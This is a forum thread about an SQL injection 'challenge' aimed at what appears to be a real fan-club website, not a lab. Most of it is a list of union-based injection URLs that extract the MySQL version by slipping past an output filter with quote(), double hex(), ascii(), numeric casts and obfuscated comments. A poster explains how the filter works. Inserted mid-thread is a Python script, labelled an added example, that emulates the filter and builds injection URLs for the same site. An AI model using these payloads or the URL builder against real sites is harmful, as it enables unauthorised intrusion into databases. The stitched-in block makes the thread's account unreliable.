denjacker

SQL Injection challenge


The following link is given:

https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50


HINTS: MySQL, Union based!

The goal of this challenge is to find the "way" to extract the database version. That's it.. just the version! :)

It can also be solved blind, but I want you to do it UNION based..

Describe how you did it! Post screenshots and whatever is needed to prove you succeeded.

Difficulty: Pretty damn hard!

Good luck >:D<


List of the answers from those who sent a PM + other possible answer variants:


Plitvix --- https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50 and 1=10 union all select quote(version())-- -
tdxev: --- http://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50 and 1=10 union all select concat(char(39), version(), char(39))--
SirGod: --- https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=-50/**/union/**/select+/*!50022+1*//*
michee : --- https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=-50/**/union/**/select/**/if(@@version=5,5,4)--
tdxev: --- http://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+hex(hex(version()))--
vogelstrauß: --- http://jonasbrothersfanclub.com//help/faqAnswer.php?faqID=50 and 1=3 union select (substring(version(),1,3))--
vogelstrauß: --- http://jonasbrothersfanclub.com//help/faqAnswer.php?faqID=50 and 1=3 union select cast(version() as date)--
TinKode: --- http://jonasbrothersfanclub.com//help/faqAnswer.php?faqID=-50/**/aNd/**/(1)=(2)/**/unIOn/*!*/seLEct/**/quOTe(vERSion())--+--/*
doi: --- https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50/**/and/**/1=2/*AMD*/union/**/all/**/select/**/ascii(mid(@@version,1,1))--

daemien --> other variants
------------------------------------------

1] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+ASCII(@@version)--
2] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+ORD(version())--
3] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+FIELD(5,version())--
4] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+FORMAT(version(),1)--
5] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CAST(version() AS UNSIGNED)--
6] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+ABS(version())--
7] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CEILING(version())--
8] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+FLOOR(@@version)--
9] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+MOD(@@version,5)--
10] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+POW(@@version,1)--
11] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+POWER(@@version,1)--
12] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+ROUND(@@version,1)--
13] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+TRUNCATE(@@version,1)--
14] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+SQRT(@@version*version())--
15] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CAST(@@version+AS+UNSIGNED)=5--
16] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+(@@version*2)/2--
17] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+(@@version-5)+IS+NULL--
18] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+BIN(version())--
19] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+(@@version-4)+IS+NOT+NULL--
20] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+@@version+BETWEEN+5+AND+10--
21] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+@@version+NOT+BETWEEN+0+AND+4--
22] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+LEAST(version(),99999)--
23] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CAST(LEAST(@@version,9999)+as+SIGNED)--
24] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CASE+WHEN+5>=(@@VERSION*2)/2+THEN+5+ELSE+4+END--
25] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+IF(5<=@@version,5,4)--
26] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+LOCATE(5,@@version)--
27] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+OCT(@@version)--
28] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+POSITION(5+IN+@@version)--
29] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+REVERSE(@@version*2/2)--



If I'd had more cigarettes that night I would have found more :))

Can someone explain to me why quote() was used? I'll be damned if I get it......

From what I saw, the filter there is applied in PHP before display, after the data has been fetched from the database.

The filter passes any string that is enclosed in single quotes and contains no single quotes inside, and any string that consists only of digits.

I dropped the concat(char(39), version(), char(39)) variant after I found out about the quote() variant.

I know using quote() doesn't make much sense, but the result is what matters most.

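The explanation above describes an output-side filter, and the payload list earlier in the thread shows why almost every working answer wraps version() in quote(), hex(hex(...)), ascii(...), or a numeric cast. The Python below is an added example, not code from the site or from any poster: it models the filter exactly as tdxev describes it (a single-quoted string with no inner quote, or a digits-only string), reimplements the handful of MySQL functions the payloads rely on, and shows which rendered results get through. The version string "5.1.41" is constructed for the demo and is not the target's real version.

```python
import re

# Constructed stand-in for what version() would return on the target (assumption).
SAMPLE_VERSION = "5.1.41"

# Model of the display filter as described in the post above (assumption, not the site's PHP):
#   pass if the value is 'quoted with no inner single quote', or consists only of digits.
_QUOTED = re.compile(r"^'[^']*'$")
_DIGITS = re.compile(r"^[0-9]+$")


def output_filter_passes(value: str) -> bool:
    """True if the modelled PHP filter would let this value reach the page."""
    return bool(_QUOTED.match(value) or _DIGITS.match(value))


# Minimal re-implementations of the MySQL functions used by the payloads.
def mysql_quote(s: str) -> str:
    # QUOTE() wraps in single quotes and backslash-escapes quote and backslash
    # (it also escapes NUL and Ctrl-Z, which cannot occur in a version string).
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def mysql_hex(s: str) -> str:
    # HEX(str) returns the uppercase hex encoding of the string's bytes.
    return s.encode().hex().upper()


def mysql_ascii(s: str) -> int:
    # ASCII(str) / ORD(str) on a one-byte-per-char string: code of the first byte.
    return ord(s[0]) if s else 0


def mysql_cast_unsigned(s: str) -> int:
    # CAST(str AS UNSIGNED) parses the leading numeric prefix; "5.1.41" -> 5.
    m = re.match(r"^[0-9]+", s)
    return int(m.group(0)) if m else 0


def evaluate_payloads(version: str = SAMPLE_VERSION) -> dict:
    """Map each payload expression to (rendered value, passes_filter)."""
    rendered = {
        "version()": version,                       # raw value: blocked
        "quote(version())": mysql_quote(version),   # 'quoted': passes
        "concat(char(39), version(), char(39))": "'" + version + "'",
        # hex of printable ASCII is 30..39 / 41..46, so a second HEX() yields digits only
        "hex(hex(version()))": mysql_hex(mysql_hex(version)),
        "ascii(mid(version(),1,1))": str(mysql_ascii(version[:1])),
        "cast(version() as unsigned)": str(mysql_cast_unsigned(version)),
        "substring(version(),1,3)": version[:3],    # "5.1": neither quoted nor digits-only
    }
    return {expr: (val, output_filter_passes(val)) for expr, val in rendered.items()}


def decode_double_hex(digits: str) -> str:
    """Undo hex(hex(x)) on the attacker side to recover the original string."""
    return bytes.fromhex(bytes.fromhex(digits).decode()).decode()


def build_injection_url(expr: str) -> str:
    """Place an expression in the union-based injection shape used in the thread."""
    base = "https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50"
    return f"{base}+and+1=0+union+select+{expr}--"


if __name__ == "__main__":
    for expr, (val, ok) in evaluate_payloads().items():
        print(f"{'PASS' if ok else 'BLOCKED':8} {expr:40} -> {val!r}")
        if ok:
            print("         ", build_injection_url(expr))
    print("decoded:", decode_double_hex(mysql_hex(mysql_hex(SAMPLE_VERSION))))
```

Under this model the raw version() and the substring(...) answer are rejected, which is consistent with the quote()/hex-twice/ascii answers being the ones everyone converged on; the substring and cast-as-date variants in the list only pass if the real filter is looser than described (for example a PHP is_numeric-style check that accepts "5.1"). If you are testing such a filter yourself, the double HEX() trick is the most general one: any byte string becomes a digits-only value, and decode_double_hex recovers it exactly.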

And what's the logic of whoever programmed it putting such a filter? And what made you think of this filter?
